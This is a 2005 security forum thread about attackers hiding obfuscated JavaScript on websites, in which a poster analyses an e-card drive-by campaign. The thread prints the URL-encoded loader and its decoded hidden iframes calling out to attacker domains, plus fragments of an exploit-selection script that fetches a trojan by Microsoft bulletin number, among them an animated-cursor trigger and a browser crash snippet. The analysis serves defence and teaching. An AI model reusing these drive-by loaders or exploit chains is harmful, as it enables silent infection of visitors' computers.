Hackers, Scammers Hide Malicious JavaScript On Web Sites

Discussion in 'other security issues & news' started by ronjor, Oct 20, 2005.

Thread Status:
Not open for further replies.
  1. ronjor

    ronjor Global Moderator

    Joined:
    Jul 21, 2003
    Posts:
    57,770
    Location:
    Texas
    Story
     
  2. nicM

    nicM nico-nico

    Joined:
    Jul 15, 2004
    Posts:
    631
    Location:
    France
    interesting link, Ronjor. One more reason to get the Noscript plugin, for people who don't run it!
     
  3. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    Several of the sites last month with the wmf exploit used this technique. I wanted to test them but the sites went down too quickly.

    More recently is the postcards.com e-card email attachment, and one of the sites is still up. If the user clicks on the attachment, it redirects to the postcards.com site (a legitimate site) while executing the javascript in the background.

    Here is the code from one page.:

    ----------------
    HEAD> META HTTP-EQUIV="Refresh" CONTENT="10; url=http://postcards.com/DigitalPostcards/pickup.html">
    HEAD>

    BODY>
    CENTER>Processing your request...CENTER>
    BODY>


    script language=javascript>document.write(unescape('%3c%69%66%72%61%6d%65%20%7
    3%72%63%3d%22%68%74%74%70%3a%2f%2f%65%37%64%61%37%2e%69%6e%6
    6%6f%2f%6f%75%74%2e%70%68%70%3f%73%5f%69%64%3d%31%22%20%77%69
    %64%74%68%3d%30%20%62%6f%72%64%65%72%3d%30%20%68%65%69%67%6
    8%74%3d%30%20%73%74%79%6c%65%3d%22%64%69%73%70%6c%61%79%3a%
    6e%6f%6e%65%22%3e%3c%2f%69%66%72%61%6d%65%3e%3c%69%66%72%61%
    6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%61%39%64%61%36
    %2e%69%6e%66%6f%2f%6f%75%74%2e%70%68%70%3f%73%5f%69%64%3d%31%
    22%20%77%69%64%74%68%3d%30%20%62%6f%72%64%65%72%3d%30%20%68
    %65%69%67%68%74%3d%30%20%73%74%79%6c%65%3d%22%64%69%73%70%
    6c%61%79%3a%6e%6f%6e%65%22%3e%3c%2f%69%66%72%61%6d%65%3e'))script>
    -------------------------

    Here are the above values converted to HTML:

    ----------------------------
    iframe
    src="http://e7da7.info/out.php?s_id=1" width=0 border=0 height=0
    style="display:none">
    iframe>

    iframe
    src="http://a9da6.info/out.php?s_id=1"
    width=0 border=0 height=0 style="display:none">
    iframe>
    -----------------------------

    The article points out that the user is sent from one site to another, each downloading one or more files.
    Taking the first URL (it no longer works):

    http://www.rsjones.net/imgs/postcards_1.gif

    http://www.rsjones.net/imgs/postcards_2.gif

    From the script in the ie0601.htm file:

    ----------------------------------
    // launching exploit which number is depends on Windows and IE versions

    function Get_Win_Version(IE_vers)

    case 5:
    PageContainer.location="ie0601e.wmf";
    ------------------------------------------

    http://www.rsjones.net/imgs/postcards_3.gif

    While all of that would be going on in the background of an unpatched system, the postcards.com site loads:

    http://www.rsjones.net/imgs/postcards_4.gif
    _________________________________________________


    There was much more. There were scripts to determine which browser, AV program, and various exploits could be triggered. One case brought up a page that ran the old cursor vulnerability that downloaded a trojan:

    -----------------------------
    <style>
    * {CURSOR: url("pluginst.anr")}
    </style>
    -----------------------------

    http://www.rsjones.net/imgs/postcards_5.gif
    ________________________________________________

    Another case directly downloaded a the same trojan:

    -----------------------------
    var Trojan_Path="http://210.0.xxx.xx/cgi-bin/ie0601.cgi?exploit=";
    -----------------------------


    Another case triggered a heap overflow that crashed the IE browser:

    ---------------------
    function CrashIE()

    var stitle="<title>Crash IE</title>";
    document.write(stitle);
    document.write("<body"+" xxxxxxxx-xxxxxxxxx>");
    window.location.reload();
    -------------------------------------


    All of this started by the simple iframe script.

    For more on the js/wonka techniques, see the Websense analysis in the PDF file mentioned at the end of the article.


    ----
     
  4. TNT

    TNT Registered Member

    Joined:
    Sep 4, 2005
    Posts:
    948
    They've been using this technique for quite a long time. The first I saw was a "dialer" site picking from the major dialer repository deposito.hostance.net, in 2003. The number of scam/exploit sites using this has been getting bigger and bigger. No matter how they try to offuscate it, though, you'll ALWAYS be able to "decrypt" the underlying code, as it is needed for the browser to render it.
     
  5. Mrkvonic

    Mrkvonic Linux Systems Expert

    Joined:
    May 9, 2005
    Posts:
    8,698
    Hi,
    Rich did you try these with Firefox (with javascript enabled / disabled) / Opera?
    Mrk
     
  6. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    Hi Mrk, even with javascript enabled, the exploits would not run in Opera - the animated cursor vulnerability, for example (via the .anr file).

    As I mentioned, using IE with javascript enabled, the exploits would run on an unpatched system.

    The wmf file did not run here, rather, prompted a download because I have Win2k which has no FAX viewer.

    But in looking at all of the results/cases in the script, there is no reason why anyone who has the MS patches installed would be vulnerable to this e-card email exploit. Even with javascript enabled in IE, the scripts would run but each exploit would fail to execute if the system/browser were patched.

    In the scripts, the exploits even are named by the MS bulletin number:

    { ExploitNumber=1; }
    if (PatchList=="SP2")
    { XP_SP2_patched=1; }
    case 1:
    Trojan_Path=Trojan_Path+"MS03-11";

    ----------------------
    This is in the .anr file:

    hxxp://210.7.77.226/cgi-bin/ie0601.cgi?exploit=MS05-002
    ________________________________________

    See here for descriptions of similar exploits:


    http://archives.neohapsis.com/archives/fulldisclosure/2004-10/0467.html

    http://national.auscert.org.au/render.html?it=4474&cid=

    The latter concludes, "Installation of the patches mentioned in Microsoft security bulletin MS03-011 [2], MS04-038 [4] and MS02-055 [5] will protect a computer against all three of the above mentioned vulnerabilities."

    Of course, the most secure patch is the one in the user's head that says, "Do not click on attachment."


    ----
     
  7. Rasheed187

    Rasheed187 Registered Member

    Joined:
    Jul 10, 2004
    Posts:
    8,038
    Location:
    The Netherlands
    As long as they are not exploiting zero day bugs, this really is not that scary, I mean a lot of sites are infected, I also get warnings from AntiVir if a site is infected, but because of my hardened IE settings the malware would not be able to do any damage even if not blocked by an AV/AT. ;)
     
  8. cheater87

    cheater87 Registered Member

    Joined:
    Apr 22, 2005
    Posts:
    3,125
    Location:
    Pennsylvania.
    *huggles noscript firefox extension*
     
Loading...
Thread Status:
Not open for further replies.